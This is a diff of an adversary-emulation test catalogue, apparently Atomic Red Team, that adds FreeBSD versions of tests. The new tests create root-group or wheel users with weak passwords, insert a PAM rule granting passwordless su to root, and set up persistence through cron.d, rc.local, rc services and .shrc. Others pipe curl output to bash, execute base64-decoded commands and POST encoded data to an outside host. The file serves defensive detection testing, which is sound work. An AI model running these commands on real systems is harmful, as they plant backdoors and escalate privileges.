elevation_required: false command: 'echo "#{at_command}" | at #{time_spec}' + - name: At - Schedule a job freebsd + auto_generated_guid: 549863fb-1c91-467e-97fc-1fa32b9f356b + description: 'This test submits a command to be run in the future by the `at` + daemon. + + ' + supported_platforms: + - linux + input_arguments: + time_spec: + description: Time specification of when the command should run + type: string + default: now + 1 minute + at_command: + description: The command to be run + type: string + default: echo Hello from Atomic Red Team + dependency_executor_name: sh + dependencies: + - description: 'The `at` executable must exist in the PATH + + ' + prereq_command: 'which at + + ' + get_prereq_command: 'echo ''Please install `at` ; they were not found in the + PATH (Package name: `at`)'' + + ' + executor: + name: sh + elevation_required: false + command: 'echo "#{at_command}" | at #{time_spec}' T1055.001: technique: modified: '2022-10-18T21:07:23.748Z' @@ -30036,6 +31166,23 @@ privilege-escalation: whoami exit cleanup_command: "userdel -r art \n" + - name: Create local account (FreeBSD) + auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0 + description: 'An adversary may wish to create an account with admin privileges + to work with. In this test we create a "art" user with the password art, switch + to art, execute whoami, exit and delete the art user. + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) + | pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n" + cleanup_command: 'rmuser -y art + + ' - name: Reactivate a locked/expired account (Linux) auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931 description: "A system administrator may have locked and expired a user account @@ -30059,6 +31206,30 @@ privilege-escalation: whoami exit cleanup_command: "userdel -r art \n" + - name: Reactivate a locked/expired account (FreeBSD) + auto_generated_guid: '09e3380a-fae5-4255-8b19-9950be0252cf' + description: "A system administrator may have locked and expired a user account + rather than deleting it. \"the user is coming back, at some stage\" An adversary + may reactivate a inactive account in an attempt to appear legitimate. \n\nIn + this test we create a \"art\" user with the password art, lock and expire + the account, try to su to art and fail, unlock and renew the account, su successfully, + then delete the account.\n" + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: | + pw useradd art -g wheel -s /bin/sh + echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0 + pw lock art + pw usermod art -e +1d + pw unlock art + pw user mod art -e +99d + su art + whoami + exit + cleanup_command: "rmuser -y art \n" - name: Login as nobody (Linux) auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85 description: 'An adversary may try to re-purpose a system account to appear @@ -30077,6 +31248,26 @@ privilege-escalation: nobody\nsu nobody\nwhoami\nexit\n" cleanup_command: "chsh --shell /usr/sbin/nologin nobody\ncat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n" + - name: Login as nobody (freebsd) + auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310 + description: 'An adversary may try to re-purpose a system account to appear + legitimate. In this test change the login shell of the nobody account, change + its password to nobody, su to nobody, exit, then reset nobody''s shell to + /usr/sbin/nologin. + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged + user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho + $(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n" + cleanup_command: | + pw usermod nobody -s /usr/sbin/nologin + cat /etc/passwd |grep nobody + # -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin T1574.012: technique: x_mitre_platforms: @@ -30849,9 +32040,8 @@ execution: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: command: description: Command to execute @@ -30902,6 +32092,33 @@ execution: rm /etc/cron.hourly/#{cron_script_name} rm /etc/cron.monthly/#{cron_script_name} rm /etc/cron.weekly/#{cron_script_name} + - name: Cron - Add script to /etc/cron.d folder + auto_generated_guid: '078e69eb-d9fb-450e-b9d0-2e118217c846' + description: 'This test adds a script to /etc/cron.d folder configured to execute + on a schedule. + + ' + supported_platforms: + - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo '*/5 * * * * root echo "Hello + from Atomic Red Team"' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in cron folder + type: string + default: persistevil + executor: + elevation_required: true + name: sh + command: 'echo "#{command}" > /etc/cron.d/#{cron_script_name} + + ' + cleanup_command: 'rm /etc/cron.d/#{cron_script_name} + + ' - name: Cron - Add script to /var/spool/cron/crontabs/ folder auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 description: 'This test adds a script to a /var/spool/cron/crontabs folder configured @@ -33103,7 +34320,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -33128,7 +34344,6 @@ execution: Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`. supported_platforms: - - linux:freebsd - linux - macos executor: @@ -33222,7 +34437,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux executor: name: sh @@ -33242,7 +34456,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux executor: name: sh @@ -33260,7 +34473,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux executor: name: sh @@ -33275,7 +34487,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux executor: name: sh @@ -33299,6 +34510,25 @@ execution: elevation_required: false command: "ART=$(echo -n \"id\" |base64 -w 0)\necho \"\\$ART=$ART\"\necho -n \"$ART\" |base64 -d |/bin/bash\nunset ART \n" + - name: Obfuscated command line scripts (freebsd) + auto_generated_guid: 5dc1d9dd-f396-4420-b985-32b1c4f79062 + description: 'An adversary may pre-compute the base64 representations of the + terminal commands that they wish to execute in an attempt to avoid or frustrate + detection. The following commands base64 encodes the text string id, then + base64 decodes the string, then pipes it as a command to bash, which results + in the id command being executed. + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: false + command: | + ART=$(echo -n "id" |b64encode -r -) + echo "\$ART=$ART" + echo -n "$ART" |b64decode -r |/bin/sh + unset ART - name: Change login shell auto_generated_guid: c7ac59cb-13cc-4622-81dc-6d2fee9bfac7 description: "An adversary may want to use a different login shell. The chsh @@ -33329,6 +34559,37 @@ execution: cat /etc/passwd |grep ^art cleanup_command: 'userdel art + ' + - name: Change login shell (freebsd) + auto_generated_guid: 33b68b9b-4988-4caf-9600-31b7bf04227c + description: "An adversary may want to use a different login shell. The chsh + command changes the user login shell. The following test, creates an art user + with a /bin/sh shell, changes the users shell to sh, then deletes the art + user. \n" + supported_platforms: + - linux + dependencies: + - description: 'chsh - change login shell, must be installed + + ' + prereq_command: 'if [ -f /usr/bin/chsh ]; then echo "exit 0"; else echo "exit + 1"; exit 1; fi + + ' + get_prereq_command: 'echo "Automated installer not implemented yet, please + install chsh manually" + + ' + executor: + name: sh + elevation_required: true + command: | + pw useradd art -g wheel -s /bin/csh + cat /etc/passwd |grep ^art + chsh -s /bin/sh art + cat /etc/passwd |grep ^art + cleanup_command: 'rmuser -y art + ' - name: Environment variable scripts auto_generated_guid: bdaebd56-368b-4970-a523-f905ff4a8a51 @@ -33348,6 +34609,25 @@ execution: echo $ART |/bin/bash cleanup_command: 'unset ART + ' + - name: Environment variable scripts (freebsd) + auto_generated_guid: 663b205d-2121-48a3-a6f9-8c9d4d87dfee + description: 'An adversary may place scripts in an environment variable because + they can''t or don''t wish to create script files on the host. The following + test, in a bash shell, exports the ART variable containing an echo command, + then pipes the variable to /bin/sh + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: false + command: | + export ART='echo "Atomic Red Team was here... T1059.004"' + echo $ART |/bin/sh + cleanup_command: 'unset ART + ' - name: Detecting pipe-to-shell auto_generated_guid: fca246a8-a585-4f28-a2df-6495973976a1 @@ -33387,6 +34667,42 @@ execution: cleanup_command: 'rm /tmp/art.txt ' + - name: Detecting pipe-to-shell (freebsd) + auto_generated_guid: 1a06b1ec-0cca-49db-a222-3ebb6ef25632 + description: 'An adversary may develop a useful utility or subvert the CI/CD + pipe line of a legitimate utility developer, who requires or suggests installing + their utility by piping a curl download directly into bash. Of-course this + is a very bad idea. The adversary may also take advantage of this BLIND install + method and selectively running extra commands in the install script for those + who DO pipe to bash and not for those who DO NOT. This test uses curl to download + the pipe-to-shell.sh script, the first time without piping it to bash and + the second piping it into bash which executes the echo command. + + ' + supported_platforms: + - linux + input_arguments: + remote_url: + description: url of remote payload + type: url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh + dependency_executor_name: sh + dependencies: + - description: 'Check if running on a Debian based machine. + + ' + prereq_command: | + if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi + if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi + get_prereq_command: 'pkg update && pkg install -y curl + + ' + executor: + name: sh + elevation_required: false + command: "cd /tmp\ncurl -s #{remote_url}\nls -la /tmp/art.txt\ncurl -s #{remote_url} + |bash\nls -la /tmp/art.txt \n" + cleanup_command: "rm /tmp/art.txt \n" - name: Current kernel information enumeration auto_generated_guid: 3a53734a-9e26-4f4b-ad15-059e767f5f14 description: 'An adversary may want to enumerate the kernel information to tailor @@ -33830,7 +35146,6 @@ execution: description: Download and execute shell script and write to file then execute locally using Python -c (command mode) supported_platforms: - - linux:freebsd - linux input_arguments: script_url: @@ -33872,7 +35187,6 @@ execution: description: Create Python file (.py) that downloads and executes shell script via executor arguments supported_platforms: - - linux:freebsd - linux input_arguments: python_script_name: @@ -33930,7 +35244,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux input_arguments: python_script_name: @@ -33995,7 +35308,6 @@ execution: ' supported_platforms: - - linux:freebsd - linux dependencies: - description: 'Verify if python is in the environment variable path and attempt @@ -34845,6 +36157,39 @@ execution: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec}' + - name: At - Schedule a job freebsd + auto_generated_guid: 549863fb-1c91-467e-97fc-1fa32b9f356b + description: 'This test submits a command to be run in the future by the `at` + daemon. + + ' + supported_platforms: + - linux + input_arguments: + time_spec: + description: Time specification of when the command should run + type: string + default: now + 1 minute + at_command: + description: The command to be run + type: string + default: echo Hello from Atomic Red Team + dependency_executor_name: sh + dependencies: + - description: 'The `at` executable must exist in the PATH + + ' + prereq_command: 'which at + + ' + get_prereq_command: 'echo ''Please install `at` ; they were not found in the + PATH (Package name: `at`)'' + + ' + executor: + name: sh + elevation_required: false + command: 'echo "#{at_command}" | at #{time_spec}' T1035: technique: x_mitre_platforms: @@ -35613,6 +36958,36 @@ persistence: ' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} + ' + - name: Malicious PAM rule (freebsd) + auto_generated_guid: b17eacac-282d-4ca8-a240-46602cf863e3 + description: | + Inserts a rule into a PAM config and then tests it. + + Upon successful execution, this test will insert a rule that allows every user to su to root without a password. + supported_platforms: + - linux + input_arguments: + path_to_pam_conf: + description: PAM config file to modify. + type: string + default: "/etc/pam.d/su" + pam_rule: + description: Rule to add to the PAM config. + type: string + default: auth sufficient pam_succeed_if.so uid >= 0 + index: + description: Index where the rule is inserted. + type: integer + default: 8 + executor: + name: sh + elevation_required: true + command: 'sudo sed -i "" "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} + + ' + cleanup_command: 'sudo sed -i "" "/#{pam_rule}/d" #{path_to_pam_conf} + ' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 @@ -37154,9 +38529,8 @@ persistence: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: command: description: Command to execute @@ -37207,6 +38581,33 @@ persistence: rm /etc/cron.hourly/#{cron_script_name} rm /etc/cron.monthly/#{cron_script_name} rm /etc/cron.weekly/#{cron_script_name} + - name: Cron - Add script to /etc/cron.d folder + auto_generated_guid: '078e69eb-d9fb-450e-b9d0-2e118217c846' + description: 'This test adds a script to /etc/cron.d folder configured to execute + on a schedule. + + ' + supported_platforms: + - linux + input_arguments: + command: + description: Command to execute + type: string + default: echo '*/5 * * * * root echo "Hello + from Atomic Red Team"' > /tmp/atomic.log + cron_script_name: + description: Name of file to store in cron folder + type: string + default: persistevil + executor: + elevation_required: true + name: sh + command: 'echo "#{command}" > /etc/cron.d/#{cron_script_name} + + ' + cleanup_command: 'rm /etc/cron.d/#{cron_script_name} + + ' - name: Cron - Add script to /var/spool/cron/crontabs/ folder auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 description: 'This test adds a script to a /var/spool/cron/crontabs folder configured @@ -38232,7 +39633,6 @@ persistence: description: Turn on Chrome/Chromium developer mode and Load Extension found in the src directory supported_platforms: - - linux:freebsd - linux - windows - macos @@ -38250,7 +39650,6 @@ persistence: auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f description: Install the "Minimum Viable Malicious Extension" Chrome extension supported_platforms: - - linux:freebsd - linux - windows - macos @@ -38267,7 +39666,6 @@ persistence: ' supported_platforms: - - linux:freebsd - linux - windows - macos @@ -40047,6 +41445,32 @@ persistence: command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" EXIT'' + ' + cleanup_command: 'rm -f /tmp/art-fish.txt + + ' + name: sh + - name: Trap EXIT (freebsd) + auto_generated_guid: be1a5d70-6865-44aa-ab50-42244c9fd16f + description: | + Launch bash shell with command arg to create TRAP on EXIT. + The trap executes script that writes to /tmp/art-fish.txt + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if bash is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v bash)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y bash)\n" + executor: + command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" + EXIT'' + ' cleanup_command: 'rm -f /tmp/art-fish.txt @@ -40064,6 +41488,32 @@ persistence: command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" SIGINT && kill -SIGINT $$'' + ' + cleanup_command: 'rm -f /tmp/art-fish.txt + + ' + name: sh + - name: Trap SIGINT (freebsd) + auto_generated_guid: ade10242-1eac-43df-8412-be0d4c704ada + description: | + Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal. + The trap executes script that writes to /tmp/art-fish.txt + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: 'Check if bash is installed. + + ' + prereq_command: 'if [ ! -x "$(command -v bash)" ]; then exit 1; else exit + 0; fi; + + ' + get_prereq_command: "(which pkg && pkg install -y bash)\n" + executor: + command: 'bash -c ''trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh" + SIGINT && kill -SIGINT $$'' + ' cleanup_command: 'rm -f /tmp/art-fish.txt @@ -40348,6 +41798,27 @@ persistence: ' name: bash elevation_required: true + - name: Create a user account on a FreeBSD system + auto_generated_guid: a39ee1bc-b8c1-4331-8e5f-1859eb408518 + description: 'Create a user via pw + + ' + supported_platforms: + - linux + input_arguments: + username: + description: Username of the user to create + type: string + default: evil_user + executor: + command: 'pw useradd #{username} -s /usr/sbin/nologin -d /nonexistent -c evil_account + + ' + cleanup_command: 'rmuser -y #{username} + + ' + name: sh + elevation_required: true - name: Create a new user in Linux with `root` UID and GID. auto_generated_guid: a1040a30-d28b-4eda-bd99-bb2861a4616c description: 'Creates a new user in Linux and adds the user to the `root` group. @@ -40374,6 +41845,32 @@ persistence: ' name: bash elevation_required: true + - name: Create a new user in FreeBSD with `root` GID. + auto_generated_guid: d141afeb-d2bc-4934-8dd5-b7dba0f9f67a + description: 'Creates a new user in FreeBSD and adds the user to the `root` + group. This technique was used by adversaries during the Butter attack campaign. + + ' + supported_platforms: + - linux + input_arguments: + username: + description: Username of the user to create + type: string + default: butter + password: + description: Password of the user to create + type: string + default: BetterWithButter + executor: + command: | + pw useradd #{username} -g 0 -d /root -s /bin/sh + echo "#{password}" | pw usermod #{username} -h 0 + cleanup_command: 'pw userdel #{username} + + ' + name: sh + elevation_required: true T1053.001: technique: x_mitre_platforms: @@ -41065,9 +42562,8 @@ persistence: persistence on victim host. \nIf the user is able to save the same contents in the authorized_keys file, it shows user can modify the file.\n" supported_platforms: - - linux:freebsd - - macos - linux + - macos executor: name: sh elevation_required: false @@ -44848,6 +46344,26 @@ persistence: head -n '-2' ~/.bashrc > /tmp/T1546.004 mv /tmp/T1546.004 ~/.bashrc name: sh + - name: Add command to .shrc + auto_generated_guid: 41502021-591a-4649-8b6e-83c9192aff53 + description: 'Adds a command to the .shrc file of the current user + + ' + supported_platforms: + - linux + input_arguments: + command_to_add: + description: Command to add to the .shrc file + type: string + default: echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004 + executor: + command: 'echo ''#{command_to_add}'' >> ~/.shrc + + ' + cleanup_command: | + head -n '-2' ~/.shrc > /tmp/T1546.004 + mv /tmp/T1546.004 ~/.shrc + name: sh - name: Append to the system shell profile auto_generated_guid: 694b3cc8-6a78-4d35-9e74-0123d009e94b description: 'An adversary may wish to establish persistence by executing malicious @@ -44855,7 +46371,6 @@ persistence: ' supported_platforms: - - linux:freebsd - linux input_arguments: text_to_append: @@ -44878,7 +46393,6 @@ persistence: ' supported_platforms: - - linux:freebsd - linux input_arguments: text_to_append: @@ -46615,6 +48129,27 @@ persistence: ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi + ' + - name: rc.local (FreeBSD) + auto_generated_guid: 2015fb48-8ab6-4fbf-928b-0b62de5c9476 + description: 'Modify rc.local + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: | + filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi + printf '%s\n' '#\!/usr/local/bin/bash' | sudo tee /etc/rc.local + echo 'python3.9 -c "import os, base64;exec(base64.b64decode(\"aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo=\"))"' | sudo tee -a /etc/rc.local + printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local + sudo chmod +x /etc/rc.local + cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename + ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && + sudo rm $origfilename;fi + ' T1209: technique: @@ -46932,6 +48467,45 @@ persistence: rm -rf #{systemd_service_path}/#{systemd_service_file} systemctl daemon-reload name: bash + - name: Create SysV Service + auto_generated_guid: 760fe8d2-79d9-494f-905e-a239a3df86f6 + description: 'This test creates a SysV service unit file and enables it as a + service. + + ' + supported_platforms: + - linux + input_arguments: + rc_service_path: + description: Path to rc service file + type: path + default: "/usr/local/etc/rc.d" + rc_service_file: + description: File name of rc service file + type: string + default: art-test + executor: + command: "echo '#\\!/bin/sh' > #{rc_service_path}/#{rc_service_file}\necho + ' ' >> #{rc_service_path}/#{rc_service_file}\necho '#' >> #{rc_service_path}/#{rc_service_file}\necho + '# PROVIDE: art-test' >> #{rc_service_path}/#{rc_service_file}\necho '# + REQUIRE: LOGIN' >> #{rc_service_path}/#{rc_service_file}\necho '# KEYWORD: + shutdown' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho + '. /etc/rc.subr' >> #{rc_service_path}/#{rc_service_file}\necho ' ' >> #{rc_service_path}/#{rc_service_file}\necho + 'name=\"art_test\"' >> #{rc_service_path}/#{rc_service_file}\necho 'rcvar=art_test_enable' + >> #{rc_service_path}/#{rc_service_file}\necho 'load_rc_config ${name}' + >> #{rc_service_path}/#{rc_service_file}\necho 'command=\"/usr/bin/touch\"' + >> #{rc_service_path}/#{rc_service_file}\necho 'start_cmd=\"art_test_start\"' + >> #{rc_service_path}/#{rc_service_file}\necho '' >> #{rc_service_path}/#{rc_service_file}\necho + 'art_test_start()' >> #{rc_service_path}/#{rc_service_file} \necho '{' + >> #{rc_service_path}/#{rc_service_file}\necho ' ${command} /tmp/art-test.marker' + >> #{rc_service_path}/#{rc_service_file}\necho '}' >> #{rc_service_path}/#{rc_service_file}\necho + ' ' >> #{rc_service_path}/#{rc_service_file} \necho 'run_rc_command + \"$1\"' >> #{rc_service_path}/#{rc_service_file}\nchmod +x #{rc_service_path}/#{rc_service_file}\nservice + art-test enable\nservice art-test start\n" + cleanup_command: | + sysrc -x art_test_enable + rm -f #{rc_service_path}/#{rc_service_file} + name: sh - name: Create Systemd Service file, Enable the service , Modify and Reload the service. auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89 @@ -47852,6 +49426,39 @@ persistence: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec}' + - name: At - Schedule a job freebsd + auto_generated_guid: 549863fb-1c91-467e-97fc-1fa32b9f356b + description: 'This test submits a command to be run in the future by the `at` + daemon. + + ' + supported_platforms: + - linux + input_arguments: + time_spec: + description: Time specification of when the command should run + type: string + default: now + 1 minute + at_command: + description: The command to be run + type: string + default: echo Hello from Atomic Red Team + dependency_executor_name: sh + dependencies: + - description: 'The `at` executable must exist in the PATH + + ' + prereq_command: 'which at + + ' + get_prereq_command: 'echo ''Please install `at` ; they were not found in the + PATH (Package name: `at`)'' + + ' + executor: + name: sh + elevation_required: false + command: 'echo "#{at_command}" | at #{time_spec}' T1556: technique: modified: '2023-04-11T03:17:32.211Z' @@ -48314,6 +49921,23 @@ persistence: whoami exit cleanup_command: "userdel -r art \n" + - name: Create local account (FreeBSD) + auto_generated_guid: 95158cc9-8f6d-4889-9531-9be3f7f095e0 + description: 'An adversary may wish to create an account with admin privileges + to work with. In this test we create a "art" user with the password art, switch + to art, execute whoami, exit and delete the art user. + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: "pw useradd art -g wheel -s /bin/sh\necho $(openssl passwd -1 art) + | pw mod user testuser1 -h 0 \nsu art\nwhoami\nexit\n" + cleanup_command: 'rmuser -y art + + ' - name: Reactivate a locked/expired account (Linux) auto_generated_guid: d2b95631-62d7-45a3-aaef-0972cea97931 description: "A system administrator may have locked and expired a user account @@ -48337,6 +49961,30 @@ persistence: whoami exit cleanup_command: "userdel -r art \n" + - name: Reactivate a locked/expired account (FreeBSD) + auto_generated_guid: '09e3380a-fae5-4255-8b19-9950be0252cf' + description: "A system administrator may have locked and expired a user account + rather than deleting it. \"the user is coming back, at some stage\" An adversary + may reactivate a inactive account in an attempt to appear legitimate. \n\nIn + this test we create a \"art\" user with the password art, lock and expire + the account, try to su to art and fail, unlock and renew the account, su successfully, + then delete the account.\n" + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: | + pw useradd art -g wheel -s /bin/sh + echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0 + pw lock art + pw usermod art -e +1d + pw unlock art + pw user mod art -e +99d + su art + whoami + exit + cleanup_command: "rmuser -y art \n" - name: Login as nobody (Linux) auto_generated_guid: 3d2cd093-ee05-41bd-a802-59ee5c301b85 description: 'An adversary may try to re-purpose a system account to appear @@ -48355,6 +50003,26 @@ persistence: nobody\nsu nobody\nwhoami\nexit\n" cleanup_command: "chsh --shell /usr/sbin/nologin nobody\ncat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n" + - name: Login as nobody (freebsd) + auto_generated_guid: 16f6374f-7600-459a-9b16-6a88fd96d310 + description: 'An adversary may try to re-purpose a system account to appear + legitimate. In this test change the login shell of the nobody account, change + its password to nobody, su to nobody, exit, then reset nobody''s shell to + /usr/sbin/nologin. + + ' + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: "cat /etc/passwd |grep nobody \n# -> nobody:x:65534:65534:Unprivileged + user:/nonexistent:/usr/sbin/nologin\npw usermod nobody -s /bin/sh\necho + $(openssl passwd -1 art) | pw mod user nobody -h 0\nsu nobody\nwhoami\nexit\n" + cleanup_command: | + pw usermod nobody -s /usr/sbin/nologin + cat /etc/passwd |grep nobody + # -> nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin T1574.012: technique: x_mitre_platforms: @@ -48588,6 +50256,37 @@ command-and-control: echo -n 111-11-1111 | base64 curl -XPOST #{base64_data}.#{destination_url} name: sh + - name: Base64 Encoded data (freebsd) + auto_generated_guid: 2d97c626-7652-449e-a986-b02d9051c298 + description: 'Utilizing a common technique for posting base64 encoded data. + + ' + supported_platforms: + - linux + input_arguments: + destination_url: + description: Destination URL to post encoded data. + type: url + default: redcanary.com + base64_data: + description: Encoded data to post using fake Social Security number 111-11-1111. + type: string + default: MTExLTExLTExMTE= + dependency_executor_name: sh + dependencies: + - description: 'Requires curl + + ' + prereq_command: "if [ -x \"$(command -v curl)\" ]; then exit 0; else exit + 1; fi; \n" + get_prereq_command: 'pkg install -y curl + + ' + executor: + command: | + echo -n 111-11-1111 | b64encode -r - + curl -XPOST #{base64_data}.#{destination_url} + name: sh T1568.002: technique: x_mitre_platforms: @@ -50100,6 +51799,33 @@ command-and-control: ' name: sh elevation_required: true + - name: Tor Proxy Usage - FreeBSD + auto_generated_guid: 550ec67d-a99e-408b-816a-689271b27d2a + description: "This test is designed to launch the tor proxy service, which is + what is utilized in the background by the Tor Browser and other applications + with add-ons in order to provide onion routing functionality.\nUpon successful + execution, the tor proxy service will be launched. \n" + supported_platforms: + - linux + dependency_executor_name: sh + dependencies: + - description: "Tor must be installed on the machine \n" + prereq_command: 'if [ -x "$(command -v tor --version)" ]; then exit 0; else + exit 1; fi + + ' + get_prereq_command: 'pkg install -y tor + + ' + executor: + command: | + sysrc tor_enable="YES" + service tor start + cleanup_command: | + service tor stop + sysrc -x tor_enable + name: sh + elevation_required: true T1001: technique: x_mitre_platforms: @@ -50213,7 +51939,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -50794,7 +52519,6 @@ command-and-control: This test simulates an infected host beaconing to command and control. Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -50883,7 +52607,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -50923,7 +52646,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -50962,7 +52684,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -50993,7 +52714,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -51024,7 +52744,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -51055,7 +52774,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -51086,7 +52804,6 @@ command-and-control: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -51301,9 +53018,8 @@ command-and-control: Note that this test may conflict with pre-existing system configuration. supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: proxy_server: description: Proxy server URL (host:port) @@ -51633,7 +53349,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -51663,7 +53378,6 @@ collection: ' supported_platforms: - - linux:freebsd - linux - macos input_arguments: @@ -51700,9 +53414,8 @@ collection: ' supported_platforms: - - linux:freebsd - - macos - linux + - macos input_arguments: test_folder: description: Path used to store files. @@ -51873,6 +53586,36 @@ collection: ' name: bash + - name: X Windows Capture (freebsd) + auto_generated_guid: 562f3bc2-74e8-46c5-95c7-0e01f9ccc65c + description: 'Use xwd command to collect a full desktop screenshot and review + file with xwud + + ' + supported_platforms: + - linux + input_arguments: + output_file: + description: Output file path + type: path + default: "/tmp/T1113_desktop.xwd" + dependency_executor_name: sh + dependencies: + - description: 'Package with XWD and XWUD must exist on device + + ' + prereq_command: | + if [ -x "$(command -v xwd)" ]; then exit 0; else exit 1; fi + if [ -x "$(command -v xwud)" ]; then exit 0; else exit 1; fi + get_prereq_command: "pkg install -y xwd xwud \n" + executor: + command: | + xwd -root -out #{output_file} + xwud -in #{output_file} + cleanup_command: 'rm #{output_file} + + ' + name: sh - name: Capture Linux Desktop using Import Tool auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1 description: 'Use import command from ImageMagick to collect a full desktop @@ -51905,6 +53648,38 @@ collection: ' name: bash + - name: Capture Linux Desktop using Import Tool (freebsd) + auto_generated_guid: 18397d87-38aa-4443-a098-8a48a8ca5d8d + description: 'Use import command from ImageMagick to collect a full desktop + screenshot + + ' + supported_platforms: + - linux + input_arguments: + output_file: + description: Output file path + type: path + default: "/tmp/T1113_desktop.png" + dependencies: + - description: 'ImageMagick must be installed + + ' + prereq_command: 'if import -help > /dev/null 2>&1; then exit 0; else exit + 1; fi + + ' + get_prereq_command: 'pkg install -y ImageMagick7 + + ' + executor: + command: 'import -window root #{output_file} + + ' + cleanup_command: 'rm #{output_file} + + ' + name: sh T1557: technique: modified: '2023-03-30T21:01:37.568Z' @@ -52136,6 +53911,39 @@ collection: tail /var/log/syslog cleanup_command: 'unset PROMPT_COMMAND + ' + - name: Logging sh history to syslog/messages + auto_generated_guid: b04284dc-3bd9-4840-8d21-61b8d31c99f2 + description: "There are several variables that can be set to control the appearance + of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents + of these variables are executed as if they had been typed on the command line. + The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable + and can be configured to write the latest \"bash history\" entries to the + syslog.\n\nTo gain persistence the command could be added to the users .shrc + or .profile \n" + supported_platforms: + - linux + 